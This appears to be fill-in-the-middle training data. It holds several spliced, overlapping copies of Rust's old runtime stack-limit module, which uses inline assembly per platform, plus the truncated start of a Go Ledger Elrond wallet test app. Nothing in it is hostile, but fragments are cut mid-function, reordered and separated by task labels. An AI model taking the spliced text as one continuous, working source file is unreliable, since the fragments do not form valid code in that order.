// we don't need to be so exact about our stack budget. The "fudge factor"
// was because LLVM doesn't emit a stack check for functions < 256 bytes in
// size. Again though, we have giant stacks, so we round all these
// calculations up to the nice round number of 20k.
record_sp_limit(stack_lo + RED_ZONE);
return target_record_stack_bounds(stack_lo, stack_hi);
#[cfg(not(windows))] #[inline(always)]
unsafe fn target_record_stack_bounds(_stack_lo: uint, _stack_hi: uint) {}
#[cfg(all(windows, target_arch = "x86"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %fs:0x04 (top) and %fs:0x08 (bottom)
asm!("mov $0, %fs:0x04" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %fs:0x08" :: "r"(stack_lo) :: "volatile");
}
#[cfg(all(windows, target_arch = "x86_64"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %gs:0x08 (top) and %gs:0x10 (bottom)
asm!("mov $0, %gs:0x08" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %gs:0x10" :: "r"(stack_lo) :: "volatile");
}
}
/// Records the current limit of the stack as specified by `end`.
///
/// This is stored in an OS-dependent location, likely inside of the thread
/// local storage. The location that the limit is stored is a pre-ordained
/// location because it's where LLVM has emitted code to check.
///
/// Note that this cannot be called under normal circumstances. This function is
/// changing the stack limit, so upon returning any further function calls will
/// possibly be triggering the morestack logic if you're not careful.
///
/// Also note that this and all of the inside functions are all flagged as
/// "inline(always)" because they're messing around with the stack limits. This
/// would be unfortunate for the functions themselves to trigger a morestack
/// invocation (if they were an actual function call).
#[inline(always)]
pub unsafe fn record_sp_limit(limit: uint) {
return target_record_sp_limit(limit);
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $$0x60+90*8, %rsi
movq $0, %gs:(%rsi)" :: "r"(limit) : "rsi" : "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:112" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:24" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:32" :: "r"(limit) :: "volatile")
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn | (limit: uint) {
asm!("movl $$0x48+90*4, %eax
movl $0, %gs:(%eax)" :: "r"(limit) : "eax" : "volatile")
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $0, %gs:48" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
use libc::c_void;
return record_sp_limit(limit as *const c_void);
extern {
fn record_sp_limit(limit: *const c_void);
}
}
// iOS segmented stack is disabled for now, see related notes
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
}
/// The counterpart of the function above, this function will fetch the current
/// stack limit stored in TLS.
///
/// Note that all of these functions are meant to be exact counterparts of their
/// brethren above, except that the operands are reversed.
///
/// As with the setter, this function does not have a __morestack header and can
/// therefore be called in a "we're out of stack" situation.
#[inline(always)]
pub unsafe fn get_sp_limit() -> uint {
return target_get_sp_limit();
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq $$0x60+90*8, %rsi
movq %gs:(%rsi), $0" : "=r"(limit) :: "rsi" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:112, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:24, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:32, $0" : "=r"(limit) ::: "volatile");
return limit;
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl $$0x48+90*4, %eax
movl %gs:(%eax), $0" : "=r"(limit) :: "eax" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl %gs:48, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
use libc::c_void;
return get_sp_limit() as uint;
extern {
fn get_sp_limit() -> *const c_void;
}
}
// iOS doesn't support segmented stacks yet. This function might
// be called by runtime though so it is unsafe to mark it as
// unreachable, let's return a fixed constant.
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
1024
}
}
| target_record_sp_limit | identifier_name |
stack.rs | // Copied from:
// rust/src/librustrt/stack.rs
// git: 70cef9474a3307ec763efc01fe6969e542083823
// stack_exhausted() function deleted, no other changes.
// TODO replace with proper runtime-less native threading once Rust gains
// support for this.
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Rust stack-limit management
//!
//! Currently Rust uses a segmented-stack-like scheme in order to detect stack
//! overflow for rust tasks. In this scheme, the prologue of all functions are
//! preceded with a check to see whether the current stack limits are being
//! exceeded.
//!
//! This module provides the functionality necessary in order to manage these
//! stack limits (which are stored in platform-specific locations). The
//! functions here are used at the borders of the task lifetime in order to
//! manage these limits.
//!
//! This function is an unstable module because this scheme for stack overflow
//! detection is not guaranteed to continue in the future. Usage of this module
//! is discouraged unless absolutely necessary.
// iOS related notes
//
// It is possible to implement it using idea from
// http://www.opensource.apple.com/source/Libc/Libc-825.40.1/pthreads/pthread_machdep.h
//
// In short: _pthread_{get,set}_specific_direct allows extremely fast
// access, exactly what is required for segmented stack
// There is a pool of reserved slots for Apple internal use (0..119)
// First dynamic allocated pthread key starts with 257 (on iOS7)
// So using slot 149 should be pretty safe ASSUMING space is reserved
// for every key < first dynamic key
//
// There is also an opportunity to steal keys reserved for Garbage Collection
// ranges 80..89 and 110..119, especially considering the fact Garbage Collection
// never supposed to work on iOS. But as everybody knows it - there is a chance
// that those slots will be re-used, like it happened with key 95 (moved from
// JavaScriptCore to CoreText)
//
// Unfortunately Apple rejected patch to LLVM which generated
// corresponding prolog, decision was taken to disable segmented
// stack support on iOS.
pub const RED_ZONE: uint = 20 * 1024;
// Windows maintains a record of upper and lower stack bounds in the Thread Information
// Block (TIB), and some syscalls do check that addresses which are supposed to be in
// the stack, indeed lie between these two values.
// (See https://github.com/rust-lang/rust/issues/3445#issuecomment-26114839)
//
// When using Rust-managed stacks (libgreen), we must maintain these values accordingly.
// For OS-managed stacks (libnative), we let the OS manage them for us.
//
// On all other platforms both variants behave identically.
#[inline(always)]
pub unsafe fn record_os_managed_stack_bounds(stack_lo: uint, _stack_hi: uint) {
record_sp_limit(stack_lo + RED_ZONE);
}
#[inline(always)]
pub unsafe fn record_rust_managed_stack_bounds(stack_lo: uint, stack_hi: uint) |
/// Records the current limit of the stack as specified by `end`.
///
/// This is stored in an OS-dependent location, likely inside of the thread
/// local storage. The location that the limit is stored is a pre-ordained
/// location because it's where LLVM has emitted code to check.
///
/// Note that this cannot be called under normal circumstances. This function is
/// changing the stack limit, so upon returning any further function calls will
/// possibly be triggering the morestack logic if you're not careful.
///
/// Also note that this and all of the inside functions are all flagged as
/// "inline(always)" because they're messing around with the stack limits. This
/// would be unfortunate for the functions themselves to trigger a morestack
/// invocation (if they were an actual function call).
#[inline(always)]
pub unsafe fn record_sp_limit(limit: uint) {
return target_record_sp_limit(limit);
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $$0x60+90*8, %rsi
movq $0, %gs:(%rsi)" :: "r"(limit) : "rsi" : "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:112" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:24" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:32" :: "r"(limit) :: "volatile")
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $$0x48+90*4, %eax
movl $0, %gs:(%eax)" :: "r"(limit) : "eax" : "volatile")
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $0, %gs:48" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
use libc::c_void;
return record_sp_limit(limit as *const c_void);
extern {
fn record_sp_limit(limit: *const c_void);
}
}
// iOS segmented stack is disabled for now, see related notes
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
}
/// The counterpart of the function above, this function will fetch the current
/// stack limit stored in TLS.
///
/// Note that all of these functions are meant to be exact counterparts of their
/// brethren above, except that the operands are reversed.
///
/// As with the setter, this function does not have a __morestack header and can
/// therefore be called in a "we're out of stack" situation.
#[inline(always)]
pub unsafe fn get_sp_limit() -> uint {
return target_get_sp_limit();
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq $$0x60+90*8, %rsi
movq %gs:(%rsi), $0" : "=r"(limit) :: "rsi" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:112, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:24, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:32, $0" : "=r"(limit) ::: "volatile");
return limit;
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl $$0x48+90*4, %eax
movl %gs:(%eax), $0" : "=r"(limit) :: "eax" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl %gs:48, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
use libc::c_void;
return get_sp_limit() as uint;
extern {
fn get_sp_limit() -> *const c_void;
}
}
// iOS doesn't support segmented stacks yet. This function might
// be called by runtime though so it is unsafe to mark it as
// unreachable, let's return a fixed constant.
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
1024
}
}
| {
// When the old runtime had segmented stacks, it used a calculation that was
// "limit + RED_ZONE + FUDGE". The red zone was for things like dynamic
// symbol resolution, llvm function calls, etc. In theory this red zone
// value is 0, but it matters far less when we have gigantic stacks because
// we don't need to be so exact about our stack budget. The "fudge factor"
// was because LLVM doesn't emit a stack check for functions < 256 bytes in
// size. Again though, we have giant stacks, so we round all these
// calculations up to the nice round number of 20k.
record_sp_limit(stack_lo + RED_ZONE);
return target_record_stack_bounds(stack_lo, stack_hi);
#[cfg(not(windows))] #[inline(always)]
unsafe fn target_record_stack_bounds(_stack_lo: uint, _stack_hi: uint) {}
#[cfg(all(windows, target_arch = "x86"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %fs:0x04 (top) and %fs:0x08 (bottom)
asm!("mov $0, %fs:0x04" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %fs:0x08" :: "r"(stack_lo) :: "volatile");
}
#[cfg(all(windows, target_arch = "x86_64"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %gs:0x08 (top) and %gs:0x10 (bottom)
asm!("mov $0, %gs:0x08" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %gs:0x10" :: "r"(stack_lo) :: "volatile");
}
} | identifier_body |
stack.rs | // Copied from:
// rust/src/librustrt/stack.rs
// git: 70cef9474a3307ec763efc01fe6969e542083823
// stack_exhausted() function deleted, no other changes.
// TODO replace with proper runtime-less native threading once Rust gains
// support for this.
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Rust stack-limit management
//!
//! Currently Rust uses a segmented-stack-like scheme in order to detect stack
//! overflow for rust tasks. In this scheme, the prologue of all functions are
//! preceded with a check to see whether the current stack limits are being
//! exceeded.
//!
//! This module provides the functionality necessary in order to manage these
//! stack limits (which are stored in platform-specific locations). The
//! functions here are used at the borders of the task lifetime in order to
//! manage these limits.
//!
//! This function is an unstable module because this scheme for stack overflow
//! detection is not guaranteed to continue in the future. Usage of this module
//! is discouraged unless absolutely necessary.
// iOS related notes
//
// It is possible to implement it using idea from
// http://www.opensource.apple.com/source/Libc/Libc-825.40.1/pthreads/pthread_machdep.h
//
// In short: _pthread_{get,set}_specific_direct allows extremely fast
// access, exactly what is required for segmented stack
// There is a pool of reserved slots for Apple internal use (0..119)
// First dynamic allocated pthread key starts with 257 (on iOS7)
// So using slot 149 should be pretty safe ASSUMING space is reserved
// for every key < first dynamic key
//
// There is also an opportunity to steal keys reserved for Garbage Collection
// ranges 80..89 and 110..119, especially considering the fact Garbage Collection
// never supposed to work on iOS. But as everybody knows it - there is a chance
// that those slots will be re-used, like it happened with key 95 (moved from
// JavaScriptCore to CoreText)
//
// Unfortunately Apple rejected patch to LLVM which generated
// corresponding prolog, decision was taken to disable segmented
// stack support on iOS.
pub const RED_ZONE: uint = 20 * 1024;
// Windows maintains a record of upper and lower stack bounds in the Thread Information
// Block (TIB), and some syscalls do check that addresses which are supposed to be in
// the stack, indeed lie between these two values.
// (See https://github.com/rust-lang/rust/issues/3445#issuecomment-26114839)
//
// When using Rust-managed stacks (libgreen), we must maintain these values accordingly.
// For OS-managed stacks (libnative), we let the OS manage them for us.
//
// On all other platforms both variants behave identically.
#[inline(always)]
pub unsafe fn record_os_managed_stack_bounds(stack_lo: uint, _stack_hi: uint) {
record_sp_limit(stack_lo + RED_ZONE);
}
#[inline(always)]
pub unsafe fn record_rust_managed_stack_bounds(stack_lo: uint, stack_hi: uint) {
// When the old runtime had segmented stacks, it used a calculation that was
// "limit + RED_ZONE + FUDGE". The red zone was for things like dynamic
// symbol resolution, llvm function calls, etc. In theory this red zone
// value is 0, but it matters far less when we have gigantic stacks because
// we don't need to be so exact about our stack budget. The "fudge factor"
// was because LLVM doesn't emit a stack check for functions < 256 bytes in
// size. Again though, we have giant stacks, so we round all these
// calculations up to the nice round number of 20k.
record_sp_limit(stack_lo + RED_ZONE);
return target_record_stack_bounds(stack_lo, stack_hi);
#[cfg(not(windows))] #[inline(always)]
unsafe fn target_record_stack_bounds(_stack_lo: uint, _stack_hi: uint) {}
#[cfg(all(windows, target_arch = "x86"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %fs:0x04 (top) and %fs:0x08 (bottom)
asm!("mov $0, %fs:0x04" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %fs:0x08" :: "r"(stack_lo) :: "volatile");
}
#[cfg(all(windows, target_arch = "x86_64"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %gs:0x08 (top) and %gs:0x10 (bottom)
asm!("mov $0, %gs:0x08" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %gs:0x10" :: "r"(stack_lo) :: "volatile");
}
}
/// Records the current limit of the stack as specified by `end`.
///
/// This is stored in an OS-dependent location, likely inside of the thread
/// local storage. The location that the limit is stored is a pre-ordained
/// location because it's where LLVM has emitted code to check.
///
/// Note that this cannot be called under normal circumstances. This function is
/// changing the stack limit, so upon returning any further function calls will
/// possibly be triggering the morestack logic if you're not careful.
///
/// Also note that this and all of the inside functions are all flagged as
/// "inline(always)" because they're messing around with the stack limits. This
/// would be unfortunate for the functions themselves to trigger a morestack
/// invocation (if they were an actual function call).
#[inline(always)]
pub unsafe fn record_sp_limit(limit: uint) {
return target_record_sp_limit(limit);
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $$0x60+90*8, %rsi
movq $0, %gs:(%rsi)" :: "r"(limit) : "rsi" : "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:112" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:24" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:32" :: "r"(limit) :: "volatile")
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $$0x48+90*4, %eax | unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $0, %gs:48" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
use libc::c_void;
return record_sp_limit(limit as *const c_void);
extern {
fn record_sp_limit(limit: *const c_void);
}
}
// iOS segmented stack is disabled for now, see related notes
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
}
/// The counterpart of the function above, this function will fetch the current
/// stack limit stored in TLS.
///
/// Note that all of these functions are meant to be exact counterparts of their
/// brethren above, except that the operands are reversed.
///
/// As with the setter, this function does not have a __morestack header and can
/// therefore be called in a "we're out of stack" situation.
#[inline(always)]
pub unsafe fn get_sp_limit() -> uint {
return target_get_sp_limit();
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq $$0x60+90*8, %rsi
movq %gs:(%rsi), $0" : "=r"(limit) :: "rsi" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:112, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:24, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:32, $0" : "=r"(limit) ::: "volatile");
return limit;
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl $$0x48+90*4, %eax
movl %gs:(%eax), $0" : "=r"(limit) :: "eax" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl %gs:48, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
use libc::c_void;
return get_sp_limit() as uint;
extern {
fn get_sp_limit() -> *const c_void;
}
}
// iOS doesn't support segmented stacks yet. This function might
// be called by runtime though so it is unsafe to mark it as
// unreachable, let's return a fixed constant.
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
1024
}
} | movl $0, %gs:(%eax)" :: "r"(limit) : "eax" : "volatile")
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)] | random_line_split |
main.go | package main
import (
"bufio"
"encoding/hex"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"log"
"math"
"math/big"
"net/http"
"os"
"strconv"
"strings"
"github.com/ElrondNetwork/ledger-elrond/testApp/ledger"
"github.com/btcsuite/btcutil/bech32"
)
const proxyHost string = "https://api.elrond.com" // https://api-testnet.elrond.com for testnet
const (
hrp = "erd"
mainnetId = "1"
)
var ticker = "eGLD"
var status = [...]string{"Disabled", "Enabled"}
var denomination *big.Float
const (
errOpenDevice = "couldn't open device"
errGetAppVersion = "couldn't get app version"
errGetConfig = "couldn't get configuration"
errSetAddress = "couldn't set account and address index"
errGetAddress = "couldn't get address"
errGetNetworkConfig = "couldn't get network config"
errGetBalanceAndNonce = "couldn't get address balance and nonce"
errEmptyAddress = "empty address"
errInvalidAddress = "invalid receiver address"
errInvalidAmount = "invalid eGLD amount"
errSigningTx = "signing error"
errSendingTx = "error sending tx"
errInvalidBalanceString = "invalid balance string"
errInvalidHRP = "invalid bech32 hrp"
errGetAddressShard = "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil {
return 0, err
}
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
